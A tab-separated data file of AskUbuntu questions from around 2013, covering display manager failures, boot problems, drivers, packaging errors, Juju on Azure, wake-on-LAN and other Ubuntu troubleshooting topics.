388316	ubuntu precise -- suspend wedges gdm -- help !	i 've been a very happy ubuntu user for many years , and worked my way past any number of problems , but i 've never seen anything like this . recently i got a new machine and installed 12.04 precise on it , and after some fiddling , it looked like everything was working fine . i just tried the suspend function for the first time , and on wakeup , gdm was seriously wedged -- a window popped up saying : '' system error '' and gave a bunch of details . i took screenshots -- i think it was a segfault thrown by simple-slave -- which i 'll post as soon as i figure out how to get them off that machine and onto the backup machine that i 'm using now . ( i clicked on the button to send an error report to ubuntu . ) now a reboot gets me to a low-res startup screen , saying `` ubuntu 12.04 '' and four dots that change from white to orange and back again , nothing more . i can use ctrl-alt-f1 to get a command line , log in there , and run startx and i get the x display ( including twinview on my two monitors ) , the cursor works , but there 's no desktop manager , no dash , no way to go further that i can see . i 've rebooted several times and this behavior is n't changing . from the command line , i 've tried using apt-get to remove and reinstall gdm , no difference . i 've tried removing gdm and telling it to use lightdm instead , no difference . i have no idea what 's going on . can anyone help ?
388317	msi gs70 reboot and select proper boot device or insert boot media	i just bought an msi gs70 and i wanted to install ubuntu from a live usb . as suggested by other posts , i switched the boot mode to legacy and after that the only thing that happens when i start up my computer is the message '' reboot and select proper boot device or insert boot media '' on a black screen . i do n't know how to access bios or get windows 8 to boot . please help me !
388325	auto mount active directory users home folder to ubuntu	we are working in the windows environment and need to move to linux ; we joind our linux pcs to the ad domain with centrfy , which is likewise open , and both are easy . every user has an home folder in the windows ad like : \\ourserver\profile\user_name and share folder : \\windowsfileserver\groupname and we block access to the local hard disk and usb drive . only the home folder and shared folder are accessible . what is the best way to mount the home folder which assigned in the active directory to every user and also block access to local folder and usb drive ? thanks in advance .
388326	banshee sorts .mp4 files as music	when i import my movies ( which are all .mp4 files ) into banshee , most of them gets placed under `` music '' instead of `` videos '' . i compared one of the movies that actually got placed under `` videos '' against one that did n't . and the only difference visible in banshee is `` mime type '' . the movies in `` videos '' has the mime type `` taglib/mp4 '' , while those under `` music '' do n't have a mime type at all . i couldnt figure out an easy way to edit this in banshee . is there an easy way to tag all my movies with `` taglib/mp4 '' as mime type ? ( i 'd prefer to tag them all at once ) i 'm running ubuntu 13.10 , if that matters .
388328	download website and make it searchable	is there a software ( apart from the browser ) that takes multiple pages that were downloaded with wget , displays them and - the most important feature - offers a fast full text search as html ( not plain text with tags like with grep ) ? should be easy to install/setup .
388329	drivers ati radeon hd 4550 no ubuntu 12.04 lts	what do you recommend ! i don know hou to proceed . in system settings , adittional drivers says there is no proprietary drivers . i saw in some foruns that have occured crashes in same situations . the thing is that when i want to play heavier games , the screen goes black immediatly ( doesn t and will not come out of it . i have to reset in the button ..i think it shoud be related with drivers .
388330	have to run the `` sodu dhclient eth1 '' after reboot	is there a solution for not having to run the above command manually every time after reboot , in order for the wi-fi to connect to the internet ?
388331	i 'm getting this error while installing ubuntu 13.10	is there anything to worry about this message . i got this message while a fresh install of ubuntu 13.10 . btw , i have tried installing ubuntu 13.10 multiple times , but i got only blank wallpaper without menus or launcher .
388333	video tearing with nvidia gt630	i have a problem with video tearing on my media computer . i have just bought a new philips tv 40 '' 7007 and a video card to go in the media pc ( nvidia gt630 ) . when i connect them up with either an hdmi , or vga i get video tearing when playing any video with a reasonable amount of motion . it is mostly in the top half of the screen . the pc is running ubuntu 12.04.3 with kernel 3.5.0-44 . i am not particularly experienced with linux , but i have tried the following things which i have seen as fixes with no result . with no proprietary drivers i get no tearing , but awful video quality . i have tried the nvidia drivers 304 , 319 and 331 all with tearing . i have changed the resolution and refresh rate from auto to 1920x1080 @ 60hz . i checked that vsync is enabled . i have turned the performance up to high performance and turned the powermizer from auto to max . i have installed compiz and enabled `` force fullscreen redraws ( buffer swap ) on repaint '' . i have also tried adding the triple buffer to xorg.conf with no luck ! at some point i swapped my gt430 from my desktop into the media pc and it runs video without any tearing . ( unfortunately keeping it there is not an option as the heatsink fouls on another card ) . i tried the media pc and gt630 with my computer monitor ( dell u2312hm ) over dvi and it also has tearing , so this would suggest it is n't the tv/monitor that is the problem . i tried the gt630 in my desktop ( ubuntu 12.04.3 kernel 3.2 ) with the same monitor and there was tearing the nvidia driver 319 . however , when i booted it into windows xp ( it is a dual boot ) and installed the drivers it came with ( 320.11 ) there was no tearing using vlc . i am at a bit of a loss ! !
388334	frequent disconnection from wirless router ( huawei lte cpe e5173s-920 )	my laptop is hp 650 . i have wireless connection issues with my huawei lte cpe e51732-920 router as it keep disconnecting after few seconds of connection . ethernet works fine though . i use the latest ubuntu 13.10 with the latest updates . i am a brand new ubuntu user with very limited knowledge of programming . can anyone please help ?
388335	emacs menu is not in the panel	i have installed emacs 24.3 in ubuntu 13.10 . and the emacs menu is not coming in the top panel instead just below it . my question is what need to be done to reslove this inconsitency .
388337	how to automatically stay updated with the latest mainline kernel ?	ubuntu manages a list of mainline kernels . if i wish to stay updated on a specific major revision ( 3.12.x ) , how can i automate this ? and how do i stop software updater from suggesting 3.11.x kernels when searching for new updates .
388338	exported .png images overlap	been having problems with png images in the animation software pencil . some things are easier to do in pencil since you have the `` onion skin '' and the `` modify curve '' tool . i was hoping make the outline in pencil and color them in flash . the problem is that when i export the animation as an image sequence the 1st individual .png will come out fine but all the other ones following end up overlap with the previous one . what 's the deal ? ?
388339	hard drive not recognized in ubuntu 12.04 install	i do n't know how to fix it the computer has no hard drive.i 'm trying to install ubuntu for the computer onto my external hard drive and none of the buttons are working . please help .
388345	prevent firefox from using gnome theme 's colour scheme for websites	this topic has been discussed several times , the solution is to edit chrome/usercontent.css and add default colours there . but unfortunately i know nothing about css files , what possibilities do i have there ? for example i created a website with a text-editor and no info on colours in it . then my usercontent.css looks like that : * { color : black ; background : # aaaaaa ; } works great on my website , but every other website probably defined colours in their own stylesheet globally for the page to inherit it . so , i 'm asking : does css format know something that 's the absolute opposite of `` ! important '' ? i.e . i want to tell firefox to use my defaults only when the defaults provided by my browser would be used , and not to overwrite what the creator of a webpage has declared to be default . anyone with some knowledge on css files here ? guess i need to replace the `` * '' by something meaningful , but i do n't know what . `` input , textarea '' is too restrictive , i want every text-content to default to my choice if none is given . of course , another way would be to alter the sourcecode of firefox itself , so it stops using theme-colours in webpages and uses hardcoded defaults . does such a patch already exist ?
388346	xubuntu resolution limited , clean install	i just did a clean install of xubuntu 13.10 , replacing windows 7 on my asus pro5dc laptop . when i ran the live cd , i noticed that the screen resolution was too low . my video card is a sis 771/671 pcie . on going to the settings , it only gave me three options , the max being 1024x768 . i installed anyway . this is my first time using linux , and i was wondering what i should do ? the screen is very out of focus because of the low res , and i am not sure which driver to download . could any one help me please . also , if it is a driver that i need to download , how do i know which one ?
388352	unable to complete install : 'post operation failed : xend_post : error from xen daemon : < fault 3:	i am having a problem in installing virtual machine on xen in ubuntu using virtual machine manager . unable to complete install : 'post operation failed : xend_post : error from xen daemon : i have search a lot on google , and many people having same problem but i am not able to solve it . please help . virsh version shubham @ shubham-vpccb35fn : ~ $ virsh version compiled against library : libvir 0.9.8 using library : libvir 0.9.8 using api : xen 0.9.8 running hypervisor : xen 4.1.0 qemu-dm-abc.log where abc is the name of virtual machine domid : 5 config qemu network with xen bridge for tap5.0 virbr0 using file /var/lib/libvirt/images/abc.img in read-write mode using file /home/shubham/dsl-4.4.10.iso in read-only mode watching /local/domain/0/device-model/5/logdirty/cmd watching /local/domain/0/device-model/5/command watching /local/domain/5/cpu char device redirected to /dev/pts/3 qemu_map_cache_init nr_buckets = 10000 size 4194304 shared page at pfn feffd buffered io page at pfn feffb guest uuid = e3adab97-6d96-26d9-0511-661096dfd097 time offset set 0 char device redirected to /dev/pts/2 xen be : console-0 : xen be : console-0 : initialise ( ) failed initialise ( ) failed failed to get hvm_param_bufioreq_evtchn error=22 unable to find x86 cpu definition
388359	running python3.3 using virtulenv	i am using ubuntu server 12.04 . the default python version is 2.7 . i have installed python 3.3 in /opt directory . when i try to create a virtualenv to use python 3.3 , i get the following error : $ virtualenv -p /opt/python3.3/bin/python3 python3_env running virtualenv with interpreter /opt/python3.3/bin/python3 traceback ( most recent call last ) : file `` usr/lib/python2.7/dist-packages/virtualenv.py '' , line 17 , in import zlib importerror : no module named 'zlib' how do i resolve this ?
388362	how to check version of installed wine and uninstall it ?	i want to know the version of wine i have installed . i am using ubuntu 12.04 . i thought in general for uninstallation without knowing version i can use this command sudo apt-get purge wine\* but this command made my system unstable . so now what can i do to remove wine from my system
388363	searching only in default directories after restart in gnome-do	after adding the directories in the file and folders plugin of gnome-do , it finds files but after restarting i need to remove these directories and add them back so as to find the files . it is searching only from default directories . so is it that after restart it searches from default only .
388369	backup with déjà dup failing	new to ubuntu , new to déjà dup too . i have been trying to setup déjà dup to backup the typical sub-folders of home/ ( ie my personal and my wife 's personal folders ) while keeping out the backups of everything else that would be unnecessary . i keep getting this error message : permission denied when trying to create ‘/media/b154cec8-cffb-4653-ad8b-2dc4d4cc72d0/backup/duplicity-full.20131209t171550z.vol1.difftar.gz’ . this happens despite that i added the folder /media on the ignore list . ignore list folder : trash downloads .gvfs smb : //192.168.1.1/media/ smb : //rt-n16/media/ /media does this mean that sub-folders of ignored folders are not ignored ? thank you
388370	poor soundquality of the mp3 playback of rhythmbox compared to vlc	i have a mysterious audiophile sound problem : the playback quality of mp3 files in rhythmbox is worse than the quality produced of vlc playing the exact same file on the exact same system . the poorer quality of the sound is expressed by a larger amount of the typical distortions caused by mp3 compression . in orchestral music , for example , the high tones of violins are distorted and sound more hideous in rhythmbox than vlc . my mp3 are encoded between 128 to 320 kbit/s . typically , i can not hear the compression distortions beyond 192 kbit/s . however , in ubuntu using rhythmbox , even 256 or 320 kbit/s files are audible distorted . quick system info : ubuntu 13.10 ( amd 64bit ) restricted media packages are installed sound configuration ist standard using pulseaudio realtek速 alc888 ( onboard ) external headphone-amp driving an akg-k240 as far as i understand , the problem must be the use of two different decoders . is it possible to see , which decoder vlc and rhythmbox are using ? and if so , can i change the decoder ? the distortion is most likely caused by the fact , that the crappy sound-chip is not supporting a 44.1k/s sample-rate . and the output of vlc does a better job in resampling to 48k than rhythmbox . is there someway to check , how the resampling/decoding is achived between the app and the hardware . sadly , i do not know too much about the inner workings of alsa , pulseaudio , gstreamer and so on . best regards gregor ps : very important , the phenomena is not observed with flac/wav/ape files , ruling out bad general mixer/equalizer/resampling settings for rhythmbox . uncompressed audio data with 44.1k is obviously resampled with sufficient quality to 48k . my problem is specific to the mp3 path .
388372	how to recover deleted partition table information	i have booted my system from a live usb ( ubuntu 12.04 64 bit ) and while i was going to format a certain partition on my hard drive , i accidentally deleted the partition table { disk utility -- > selected my partition from the menu on left side of the window -- > format ( at the upper center part of the window ) -- > i select partition table -- > and hit format } . now it does n't show any partitions ( see attachment ) . and says `` unallocated space '' whereas it is allocated and there is data that are really important and i can not afford to lose . i want to ask is there any way out to recover this information . i have already used testdisk and it has found three partitions successfully whereas the fourth one is still missing . if you recommend using the same software ( testdisk ) kindly guide me how can i find the fourth one as well and how can i recover them later on ( after finding the right partitions ) . i do n't know if it is duplicate or not but as far as i have searched on this site , most of the posts were not helpful . posts related to testdisk has worked for me to some extent but still i am confused . if you mind asking like this , kindly remove this question . i do n't mind . sorry for any inconvenience caused . thanks
388374	explaining `` -bash : no such file or directory ''	why would bash claim that a file does n't exist when it clearly does ? $ ls -l a -r-x -- -- -- 1 configurator configurator 3904 dec 7 10:36 a $ file a a : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.2.5 , stripped $ ./a -bash : ./a : no such file or directory
388375	saving live video streams	can anyone suggest software to download / grab live video streams from ustream , youtube etc . as they are streaming live ? video downloading tools do not work with live streams .
388379	keynote file showing as 0 bytes	i know i ca n't do anything functional with an apple keynote file , in ubuntu , but i have needed to download them or transfer them and send them along as email attachments . the problem is , once attached ( using webmail ) the files look fine as far as representing their actual size ... but , files 3.8.2 on ubuntu 13.10 as well as ls -lah from the terminal shows the file as 0 bytes . this sucks when trying to sort by filesize obviously . any reason why , bug , otherwise ? maybe it 's getting confused because .key files are typically cryptographic mimetypes and apple 's keynote mimetype is n't even in the system and when tried to be read as text it sees it as empty ? edit : just for fun , i tried to open it with libreoffice . the file ( that which is actually 3.8mb ) is now showing as 1.5k instead of 0 bytes ... weird
388380	ubuntu 12.04 chrome kiosk audio	we are successfully using ubuntu 12.04 in a kiosk mode for a restricted user but we are having an issue with manipulating audio . the kiosk user is set to automatically log in and then a maximized google chrome browser opens to our homepage . if the user goes to a site that plays audio the volume is extremely low by default and they can not change this setting . due to the maximized browser there is no panel bar at the top for them to access the volume icon and most keyboard shortcuts do not work . i have tried changing the keyboard shortcuts to no avail . is there a way to display the panel just for volume or is there a better way to go about this ? below you will find the kiosk.desktop and chromekiosk.sh contents that we are currently using : kiosk.desktop : [ desktop entry ] encoding=utf-8 name=kiosk mode comment=chromium kiosk mode exec=/usr/share/xsessions/chromekiosk.sh type=application chromekiosk.sh : # ! /bin/bash xscreensaver -nosplash & cat ~/.config/chromium/local\ state | perl -pe `` s/\ '' bottom./\ '' bottom\ '' : $ ( xrandr | grep * | cut -d ' ' -f4 | cut -d'x ' -f2 ) , / '' > ~/.config/chromium/local\ state cat ~/.config/chromium/local\ state | perl -pe `` s/\ '' right./\ '' right\ '' : $ ( xrandr | grep * | cut -d ' ' -f4 | cut -d'x ' -f1 ) , / '' > ~/.config/chromium/local\ state while true ; do chromium-browser % u -- start-maximized ; sleep 5s ; done
388382	multi-partition multi os bootable usb	i want to create a recovery flash drive . i have my 8 gb flash drive [ kingston data traveller ] with me . i also have the required .iso files for a > ubuntu 13.10 b > boot-repair disk c > avg rescue cd i wish to create 4 partitions ( 3 for each bootable .iso and one for data storage . also , i want a way in which i can select which os to boot each time i boot from usb . so , is there a way to install grub on usb as well as the three other live distros ? and how to create such a setup ?
388385	security question . ubuntu installation on windows pc	i am installing ubuntu alongside windows 7 because i believe ubuntu is more secure ( in terms of viruses , spyware etc ) . so the computer will be contain both oss . in such a situation , is ubuntu still as secure as if it was the only os on the computer ? or is it more vulnerable because viruses can get onto the ubuntu partition when using windows os ? thanks
388387	lubuntu 13.10 - online video ( ie youtube ) will not run in firefox or chromium .	just installed lubuntu 13.10 on an old dell dimension 3000 w/ 2gb ram . installation appeared to go fine , but i can not get online videos to play properly using firefox or chromium . using both youtube and vimeo as tests all i get is choppy sound and horrible distorted and unrecognizable video . i disabled hardware acceleration and problem persists . i have looked through previous posts and can not find a solution . one person did suggest using tor , which i will attempt , but i 'd prefer to use regular firefox . thanks . mig
388390	shape/throttle an ip on the network ( qos )	i 've got a server running 12.04 set up as a modem . dhcp , nat , etc . i need to know how to reduce the speed of a single ip on the network or set the speed of each individual ip . my problem is my brother 's gf keeps running torrents 24/7 , making my internet horribly slow . asking her to stop has n't worked , so now i need to control her connection . i think my options are either limiting her to , say 4mbps down and 300kbps up ... or throwing qos at her . i 've no idea how to do either .
388392	how to include additional software in preseed.cfg for ubuntu server 13.10	i am doing fully automated installation of ubuntu server ( saucy ) 13.10 and also wants to include custom additional softwares , the format of preseed.cfg is : d-i debian-installer/locale string en_us d-i debian-installer/language string en d-i debian-installer/country string nl d-i debian-installer/locale string en_gb.utf-8 d-i console-setup/ask_detect boolean false d-i keyboard-configuration/modelcode string pc105 d-i keyboard-configuration/layoutcode string us d-i netcfg/choose_interface select auto d-i netcfg/dhcp_failed note d-i netcfg/dhcp_options select configure network manually d-i netcfg/get_nameservers string 192.168.1.1 d-i netcfg/get_ipaddress string 192.168.1.42 d-i netcfg/get_netmask string 255.255.255.0 d-i netcfg/get_gateway string 192.168.1.1 d-i netcfg/confirm_static boolean true d-i netcfg/get_hostname string demo d-i netcfg/get_domain string www.demo.com d-i netcfg/wireless_wep string d-i mirror/country string manual d-i mirror/http/hostname string archive.ubuntu.com d-i mirror/http/directory string /ubuntu d-i mirror/http/proxy string d-i mirror/http/mirror select cc.archive.ubuntu.com d-i clock-setup/utc boolean true d-i time/zone string us/eastern d-i clock-setup/ntp boolean true d-i clock-setup/ntp-server string ntp.example.com d-i partman-auto/disk string /dev/sda d-i partman-auto/method string regular d-i partman-auto/choose_recipe select atomic d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i partman-md/confirm boolean true d-i partman-partitioning/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true d-i partman/confirm_nooverwrite boolean true d-i passwd/user-fullname string demo d-i passwd/username string demo d-i passwd/user-password password demo123 d-i passwd/user-password-again password demo123 d-i user-setup/allow-password-weak boolean true d-i user-setup/encrypt-home boolean false tasksel tasksel/first multiselect ubuntu-desktop d-i pkgsel/include string openssh-server build-essential juju ruby virtualbox kvm git openstack d-i pkgsel/update-policy select none d-i grub-installer/only_debian boolean true d-i grub-installer/with_other_os boolean true d-i finish-install/reboot_in_progress note i tried to include custom softwares juju , openstack by write them in the end of % post , by this way : % post juju git openstack ruby but i got parsing error , now i tried to include those softwares in pkgsel/include but again got error , is there any way to fix this ? can i do this using late command ?
388393	how to download ubuntu for android ?	so i am stuck . i am trying to figure out where to download ubuntu for android and it is n't appearing anywhere on this site . please help !
388395	what is the purpose of ubuntu-vg partiton ?	so , i 'm new to partitioning and recently i installed ubuntu 13.10 . i followed several online tutorials on how to create disk partitions effectively and all of them said that after ubuntu is done installing , i should have three partitions - home , swap and root . i installed gparted and saw that i only have two partitions - boot and ubuntu-vg , which is a part of an extended partition . my question is is ubuntu-vg a replacement for mentioned partitions ? if i will want to , say , dual boot ubuntu with windows in sooner future , is it dangerous to resize it or mess with it in any other way ? thanks in advance : d
388397	can not boot into windows 7 after installing ubuntu 12.04	i have recently installed ubuntu with a usb on my laptop which already have windows 7 i can not boot into windows 7 . when ever i try to boot into windows 7 . i get a blank screen for a sec or two and get back boot menu . i have tried to sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair boot-repair this is the link for bootinfo script . http : //paste.ubuntu.com/6547087/ i do n't have a cd/dvd drive i am a novice .please assist me : (
388398	power-indicator shows 15 % when not on ac power	when i plug my pc ( dell latitude e5430 ) to power source , ubuntu 13.10 always shows 15 % in power indicator , but i know that battery is fully charged . when i disconnect the power source , it shows the battery level correctly . i also use wireless mouse and keyboard and indicator always show `` estimating '' , not power level . do i have to wait for full discharge ( of them ) to change it ? edit after charging battery indicator show mouse battery level - anyone have idea how to force it to show only pc energy level ( with ability to see mouse level on click ) ? does anyone know how to fix it ?
388401	chromium : typing causes browser to switch to full screen	this happens whenever i am typing into chromium : the browser switches when i am typing . it flips between normal screen size and full screen . i am using chromium on ubuntu 12.04 . this happens if i am typing a question in askubuntu or into the title bar . thanks , dl
388405	boot sequence device failure	i am running ubuntu 12.04 on a compaq ( hp ) desktop . it installed fine and ran good until one day i started getting the following : 541 : hdio_get_idenity failed for '/dev/sdb/ ' : invalid arguement but then it goes away and everything boots good and the system works fine . i have looked into it and can not seem to solve it . can anyone help ? thanks in advance : )
388407	graphics problems in lubuntu 13.10	my screen keeps flashing and there 's colored pixels in some spots . it 's a fresh install with all updates . arno @ arno-mt-7641 : ~ $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs780l [ radeon 3000 ]
388412	bulding packages : $ { shlibs : depends } fails for precise	i 'm trying to build a set of small packages using the following scheme : source tarball turned into bzr repo using bzr dh-make source package built using dpkg-buildpackage -s -sa upload source tarball to apt archive maintained by reprepro and rebuildd dput local xyz_source.changes rebuildd building the package using pbuilder build -- debbuildopts `` -b '' -- basetgz < correct tgz > -- binary-arch -- architecture $ { a } $ { p } _ $ { v } .dsc rebuildd putting the packages onto the apt repo via reprepro all of this is happening on an up-to-date saucy amd64 installation . the problem i seem to have , however , is that ' $ { shlibs : depends } ' and 'bzr-gencontrol ' do n't seem to be working as expected for precise , as seen in the following snippet from a buildlog for precise amd64 . dh_gencontrol -a dpkg-gencontrol : warning : depends field of package python-libxtcon : unknown substitution variable $ { shlibs : depends } this problem arises only for the packages built for precise - both amd64 and i386 . packages built for quantal , raring , saucy , and trusty work fine ( though they do throw a different warning which likely does n't effect me ) . the corresponding lines from a buildlog for the same package ( everything identical , except for version number and distribution specified in debian/changelog ) , are as follows : dh_gencontrol -a dpkg-gencontrol : warning : file : :fcntllock not available ; using flock which is not nfs-safe the generated packages for precise lack the correct depends : information , while those for quantal , raring , saucy , and testy have good depends . $ lesspipe python-libxlia_0.1-0~precise1_amd64.deb python-libxlia_0.1-0~precise1_amd64.deb : new debian package , version 2.0. size 5348 bytes : control archive=634 bytes . 412 bytes , 12 lines control 404 bytes , 5 lines md5sums package : python-libxlia version : 0.1-0~precise1 architecture : amd64 maintainer : chintalagiri shashank < shashank.chintalagiri @ gmail.com > installed-size : 48 depends : python-support ( > = 0.90 ) section : python priority : extra homepage : < snip > description : < snip > *** contents : drwxr-xr-x root/root 0 2013-12-08 22:58 ./ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/lib/ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/lib/python2.7/ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/lib/python2.7/site-packages/ -rw-r -- r -- root/root 4102 2013-12-08 22:58 ./usr/lib/python2.7/site-packages/libxlia.py -rw-r -- r -- root/root 192 2013-12-08 22:58 ./usr/lib/python2.7/site-packages/libxlia-0.1-py2.7.egg-info -rw-r -- r -- root/root 5508 2013-12-08 22:58 ./usr/lib/python2.7/site-packages/libxlia.pyc drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/share/ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/share/doc/ drwxr-xr-x root/root 0 2013-12-08 22:58 ./usr/share/doc/python-libxlia/ -rw-r -- r -- root/root 157 2013-12-08 20:56 ./usr/share/doc/python-libxlia /changelog.debian.gz -rw-r -- r -- root/root 2186 2013-12-08 20:56 ./usr/share/doc/python-libxlia/copyright $ lesspipe python-libxlia_0.1-0~quantal1_amd64.deb python-libxlia_0.1-0~quantal1_amd64.deb : new debian package , version 2.0. size 36070 bytes : control archive=712 bytes . 495 bytes , 12 lines control 482 bytes , 6 lines md5sums package : python-libxlia version : 0.1-0~quantal1 architecture : amd64 maintainer : chintalagiri shashank < shashank.chintalagiri @ gmail.com > installed-size : 129 depends : libc6 ( > = 2.14 ) , libftdi1 ( > = 0.20 ) , libgcc1 ( > = 1:4.1.1 ) , libstdc++6 ( > = 4.1.1 ) , python-support ( > = 0.90 ) section : python priority : extra homepage : < snip > description : < snip > *** contents : drwxr-xr-x root/root 0 2013-12-08 22:07 ./ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/lib/ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/lib/python2.7/ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/lib/python2.7/site-packages/ -rw-r -- r -- root/root 4102 2013-12-08 22:07 ./usr/lib/python2.7/site-packages/libxlia.py -rw-r -- r -- root/root 82528 2013-12-08 22:07 ./usr/lib/python2.7/site-packages/_libxlia.so -rw-r -- r -- root/root 192 2013-12-08 22:07 ./usr/lib/python2.7/site-packages/libxlia-0.1-py2.7.egg-info -rw-r -- r -- root/root 5508 2013-12-08 22:07 ./usr/lib/python2.7/site-packages/libxlia.pyc drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/share/ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/share/doc/ drwxr-xr-x root/root 0 2013-12-08 22:07 ./usr/share/doc/python-libxlia/ -rw-r -- r -- root/root 156 2013-12-08 21:56 ./usr/share/doc/python-libxlia/changelog.debian.gz -rw-r -- r -- root/root 2186 2013-12-08 21:56 ./usr/share/doc/python-libxlia/copyright the debian/control file used is : source : python-libxlia priority : extra maintainer : chintalagiri shashank < shashank.chintalagiri @ gmail.com > build-depends : debhelper ( > = 8.0.0 ) , python-dev ( > = 2.7.3 ) , swig ( > =2.0.0 ) , libftdi-dev ( > =0.19-4 ) standards-version : 3.9.4 section : libs homepage : < snip > package : python-libxlia section : python architecture : amd64 i386 depends : $ { shlibs : depends } , $ { misc : depends } , python-support ( > =0.90 ) description : < snip > i 've also put up the full buildlogs for the precise and quantal package builds . any help trying to sort this our would be greatly appreciated . please let me know if any additional information is required or may be useful . even a general direction to look into on this would be useful , since i have no idea where to even start looking .
388413	where is the command `gnome-display-properties`	after upgrading from ubuntu 11.04 to 13.10 , the command gnome-display-properties is gone . i can open it via gnome-control-center . how can i open this dialogue just with a command ?
388415	swapping right shift and delete key using xmodmap	i 'm unsure how to swap these 2 , this is the thought process i had but am unsure how to get it working : remove sh = shift_r remove dl = delete keysym delete = shift_r keysym shift_r = delete add sh = delete add dl = shift_r this is based on the code i use to swap caps lock and control . any thoughts ? xmodmap output : dan @ lantea : ~ $ xmodmap -pke | grep shift_r keycode 91 = shift_r nosymbol shift_r keycode 119 = shift_r nosymbol shift_r dan @ lantea : ~ $ xmodmap -pke | grep delete keycode 62 = delete nosymbol delete
388418	ubuntu one files shared is very slow	why the speed of shared files is very slow compared with the normal files ? for example , i have one file private , not shared and the speed is excellent . after , i shared this file then i try to download this file and the download speed falls considerably to 30 or 40 kbps .
388419	juju bootstrap fails in azure ( badrequest - the affinity group name is empty or was not specified . )	commmand and results copied below . i 'm aware of https : //bugs.launchpad.net/juju-core/+bug/1236136 but this is a separate issue as i am using the west us region for everything . this occurs when trying to bootstrap from an azure vm and from a standalone machine . also , it seemed to come up in 1.16.3 too . certificates have been uploaded per instructions . also , this occurs if i open the -- upload-tools argument . dm @ prd-juju : ~/development/docmunch/ops/juju/juju-config $ rm -f ~/.juju/environments/* & & juju bootstrap -- show-log -- upload-tools 2013-12-09 19:46:23 info juju.environs.tools build.go:162 found existing jujud 2013-12-09 19:46:23 info juju.environs.tools build.go:172 target : /tmp/juju-tools155984108/jujud 2013-12-09 19:46:28 info juju.environs.sync sync.go:235 built 1.16.4.1-saucy-amd64 ( 4537kb ) 2013-12-09 19:46:28 info juju.environs.sync sync.go:66 listing available tools 2013-12-09 19:46:28 info juju.environs.sync sync.go:90 found 2 tools 2013-12-09 19:46:28 info juju.environs.sync sync.go:100 listing target bucket 2013-12-09 19:46:28 info juju.environs.sync sync.go:113 found 0 tools in target ; 2 tools to be copied 2013-12-09 19:46:28 info juju.environs.sync sync.go:143 copying 1.16.4.1-precise-amd64 from file : ///tmp/932795739/tools/releases/juju-1.16.4.1-precise-amd64.tgz 2013-12-09 19:46:28 info juju.environs.sync sync.go:157 copying tools/releases/juju-1.16.4.1-precise-amd64.tgz 2013-12-09 19:46:28 info juju.environs.sync sync.go:171 downloaded tools/releases/juju-1.16.4.1-precise-amd64.tgz ( 4537kb ) , uploading 2013-12-09 19:46:28 info juju.environs.sync sync.go:172 download 4537kb , uploading 2013-12-09 19:46:29 info juju.environs.sync sync.go:143 copying 1.16.4.1-saucy-amd64 from file : ///tmp/932795739/tools/releases/juju-1.16.4.1-saucy-amd64.tgz 2013-12-09 19:46:29 info juju.environs.sync sync.go:157 copying tools/releases/juju-1.16.4.1-saucy-amd64.tgz 2013-12-09 19:46:30 info juju.environs.sync sync.go:171 downloaded tools/releases/juju-1.16.4.1-saucy-amd64.tgz ( 4537kb ) , uploading 2013-12-09 19:46:30 info juju.environs.sync sync.go:172 download 4537kb , uploading 2013-12-09 19:46:31 info juju.environs.sync sync.go:118 copied 2 tools 2013-12-09 19:46:31 info juju.environs.sync sync.go:120 generating tools metadata 2013-12-09 19:46:31 info juju.environs.tools simplestreams.go:277 writing tools/streams/v1/index.json 2013-12-09 19:46:31 info juju.environs.tools simplestreams.go:277 writing tools/streams/v1/com.ubuntu.juju : released : tools.json 2013-12-09 19:46:31 info juju.environs.sync sync.go:128 tools metadata written 2013-12-09 19:46:32 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.16 2013-12-09 19:46:32 info juju.environs.tools tools.go:93 filtering tools by version : 1.16.4.1 2013-12-09 19:46:32 info juju.environs.tools tools.go:96 filtering tools by series : precise 2013-12-09 19:46:34 info juju.environs.boostrap bootstrap.go:50 bootstrapping environment `` azure '' 2013-12-09 19:46:34 info juju.environs.tools tools.go:85 reading tools with major.minor version 1.16 2013-12-09 19:46:34 info juju.environs.tools tools.go:93 filtering tools by version : 1.16.4.1 2013-12-09 19:46:34 info juju.environs.tools tools.go:96 filtering tools by series : precise 2013-12-09 19:46:48 error juju supercommand.go:282 post request failed : badrequest - the affinity group name is empty or was not specified . ( http code 400 : bad request )
388420	do i need lvm password and passeord for my user-account	just install an new copy of ubuntu 13.10 now it give me the option to make an password on my lvm-volume.. but then i have to password to write , to do an full login ! my lvm-password and password for my user-accounts . after my understanding . i have the option to just only encrypt my user-accounts folers : /home/user but is this encryption as strong as the one for the lvm ?
388422	what could make wake-on-lan inconsistent ?	i have a remote system configured for wake-on-lan . it has been tested successfully . but sometimes it does n't work . for instance , today it worked once , but when i shut down and tried again , it did n't work the 2nd time . specifics : ubuntu 12.04lts bios is configured for pci wakeup . router port forwarding for port 9 is active . i run ethtool -s eth0 wol g in a startup script . i am shutting down the remote system by running sudo shutdown -p now over ssh i am running wakeonlan -i $ hostname -p 9 $ mac on my local machine . i verified the magic packets are arriving by running sudo tcpdump -i eth0 udp port 9 on the target . what would make wol work sometimes , but not others ? does the way the system is shut down affect wol ?
388423	wifi gets connected only for sometime after upgrading to 13.10	i recently upgraded to ubuntu 13.10 from 13.04 . when i start my laptop , only for sometimes the wifi will be connected and after sometimes it disconnects . it wo n't get connected again even if i try to connect it manually . if i reboot again it 'll be connected for sometime and same thing happens . how can i fix this ?
